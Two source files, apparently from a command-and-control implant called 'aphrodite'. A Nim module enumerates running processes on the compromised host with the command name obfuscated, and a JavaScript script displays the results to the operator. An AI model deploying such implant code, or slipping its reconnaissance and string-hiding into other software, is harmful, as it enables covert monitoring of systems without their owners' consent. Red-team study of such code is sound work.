File: Payload_Type/aphrodite/agent_code/src/commands/recon/ps.nim
import std/[json, osproc, strutils]
import core/types
import commands/registry
import crypto/strenc

proc psExecute(taskId: string, params: JsonNode, state: AgentState,
               send: SendMsg): TaskResult =
  let processes = newJArray()
  try:
    when defined(windows):
      # Get-CimInstance replaces WMIC (removed in Windows 11 22H2+)
      # @() forces array output even for single process
      let (raw, _) = execCmdEx(
        "powershell -NoProfile -NonInteractive -Command " &
        "\"@(Get-CimInstance Win32_Process | Select-Object ProcessId,ParentProcessId,Name,ExecutablePath,CommandLine) | ConvertTo-Json -Depth 2\"",
        options = {poStdErrToStdOut})
      let jdata = parseJson(raw.strip())
      let arr = if jdata.kind == JArray: jdata else: newJArray()
      for obj in arr:
        processes.add(%*{
          "process_id":        obj{"ProcessId"}.getInt(0),
          "parent_process_id": obj{"ParentProcessId"}.getInt(0),
          "name":              obj{"Name"}.getStr(""),
          "bin_path":          obj{"ExecutablePath"}.getStr(""),
          "command_line":      obj{"CommandLine"}.getStr(""),
          "user":              "",
          "architecture":      "x64",
          "update_deleted":    true,
        })
    else:
      # ps -eo pid,ppid,user,comm,args --no-headers (Linux/macOS)
      let (raw, _) = execCmdEx("ps -eo pid,ppid,user,comm,args --no-headers",
                                options = {poStdErrToStdOut})
      for line in raw.splitLines():
        let s = line.strip()
        if s.len == 0: continue
        let parts = s.splitWhitespace(maxSplit = 4)
        if parts.len < 4: continue
        var pid, ppid: int
        try: pid  = parseInt(parts[0]) except: pid  = 0
        try: ppid = parseInt(parts[1]) except: ppid = 0
        let user    = parts[2]
        let name    = parts[3]
        let cmdline = if parts.len > 4: parts[4] else: name
        processes.add(%*{
          "process_id":        pid,
          "parent_process_id": ppid,
          "name":              name,
          "bin_path":          "",
          "command_line":      cmdline,
          "user":              user,
          "architecture":      "x64",
          "update_deleted":    true,
        })

    return TaskResult(
      output:      $(%*{"processes": processes}),
      status:      "success",
      completed:   true,
      extraFields: %*{"processes": processes},
    )
  except Exception as e:
    return TaskResult(output: "Error: " & e.msg, status: "error", completed: true)

proc initPs*() =
  register(hidstr("ps"), psExecute)

File: Payload_Type/aphrodite/agent_functions/browser_scripts/ps.js
function(task, responses) {
    if (task.status.includes("error")) {
        const combined = responses.reduce((prev, cur) => prev + cur, "");
        return {'plaintext': combined};
    } else if (responses.length > 0) {
        let rows = [];
        const headers = [
            {"plaintext": "PID",     "type": "number", "cellStyle": {}},
            {"plaintext": "PPID",    "type": "number", "cellStyle": {}},
            {"plaintext": "Name",    "type": "string", "cellStyle": {"fillWidth": true}},
            {"plaintext": "User",    "type": "string", "cellStyle": {}},
            {"plaintext": "Arch",    "type": "string", "cellStyle": {}},
            {"plaintext": "Command", "type": "string", "cellStyle": {"fillWidth": true}},
        ];

        for (let i = 0; i < responses.length; i++) {
            let data;
            try {
                data = JSON.parse(responses[i]);
            } catch (e) {
                return {'plaintext': responses.reduce((p, c) => p + c, "")};
            }

            const procs = data["processes"] ? data["processes"] : data;
            if (!procs) continue;

            for (let j = 0; j < procs.length; j++) {
                const p = procs[j];
                rows.push({
                    "rowStyle": {},
                    "PID":     {"plaintext": String(p["process_id"] || ""), "cellStyle": {}},
                    "PPID":    {"plaintext": String(p["parent_process_id"] || ""), "cellStyle": {}},
                    "Name":    {"plaintext": p["name"] || "", "cellStyle": {"fillWidth": true}},
                    "User":    {"plaintext": p["user"] || "", "cellStyle": {}},
                    "Arch":    {"plaintext": p["architecture"] || "", "cellStyle": {}},
                    "Command": {"plaintext": p["command_line"] || "", "cellStyle": {"fillWidth": true}},
                });
            }
        }

        return {"table": [{"headers": headers, "rows": rows, "title": "Process List"}]};
    } else {
        return {"plaintext": "No output."};
    }
}
